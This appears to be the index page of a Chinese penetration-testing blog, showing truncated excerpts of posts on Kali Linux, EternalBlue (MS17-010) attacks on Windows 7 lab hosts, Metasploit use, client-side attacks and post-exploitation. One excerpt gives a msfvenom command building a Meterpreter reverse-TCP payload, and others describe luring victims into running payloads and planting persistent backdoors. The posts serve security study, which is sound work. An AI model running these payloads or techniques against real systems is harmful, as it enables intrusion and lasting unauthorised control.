1stPeak's Blog

Kali Linux2基础 简介 安装 1.在硬盘中安装Kali Linux2（这里简单介绍下，不演示具体安装） 2.在VMware虚拟机中安装Kali Linux2 3.在加密U盘中安装Kali Linux2 常用操作 简介 Kali是由Offensive Security经原Back Track系统(曾经是世界上最为优秀的渗透测试操作系统)演变...

（1）vim /etc/ssh/sshd_config（2）将PermitRootLogin without-password 改为 PermitRootLogin yes（3）去掉#（4）重启ssh，/etc/init.d/ssh restart

MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透，x64的请点击这里利用MS17-010渗透win7（64位），我们这里的环境是攻击者（IP：192.168.1.222），靶机（IP：192.168.1.221）...

这里是接着之前一篇"利用MS17-010渗透win7（32位)"的姊妹篇，想了解win7（32位）如何利用永恒之蓝渗透的请点击利用MS17-010渗透win7（32位)Win7x64的渗透，我们就可以不用下载利用模块了，kali里已经帮你集成好了我这里的攻击机（192.168.1.222），靶机（192.168.1.111），记得靶机关闭防火墙 渗透流程 权限提升利用 渗透...

MSF基础一、前言msfconsole作用：打开msfPS：当前版本的msf不需要再msfconsole之前再输入service postgresql start，以前的版本可能需要msfdb init作用：初始化msfdbmsfdb start作用：开启msfdbmsfdb stop作用：暂停msfdb疑难解决：如果出现如下所示问题，初始化数据库即可二、基本内容在...

msf外内部常用命令安全牛学习Metasploit Framework笔记1、msf外部命令msfconsole -h/-q/-r/-v/exitmsf的帮助信息/安静启动，没有banner/使用msfconsole自动化执行rc文件里的内容/msf版本/退出msfhelp/?/help xxx帮助信息/帮助信息/查看具体名称的帮助i信息service postgresql s...

MSF（三）：信息收集1、Nmap扫描开启了哪些服务db_nmap -sV 192.168. 1.0/242、Auxiliary扫描模块使用时，指定RHOSTS或RHOST192.168.1.20-192.168.1.30或192.168.1.1-30或192.168.1.0/24, 192.168.11.0/24, 192.168.100.141或file:/root/h.txt3、a...

MSF（四）：常用弱点扫描模块安全牛学习Metasploit Framework笔记

客户端渗透在无法突破网络边界的情况下转而攻击客户端1、含有漏洞利用代码的WEB站点利用客户端漏洞2、社会工程学直接骗取到敏感信息含有漏洞利用代码的DOC、PDF等文档或Payload，诱骗被害者执行3、诱骗被害者执行Payload (windows)注：msfvenom集合了编码、payloadmsfvenom --list-options -p windows/she...

后渗透测试安全牛学习Metasploit Framework笔记一、已经获得目标系统控制权后扩大战果 （1）提权（2）信息收集（3）渗透内网（4）永久后门二、基于已有session扩大战果- msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444...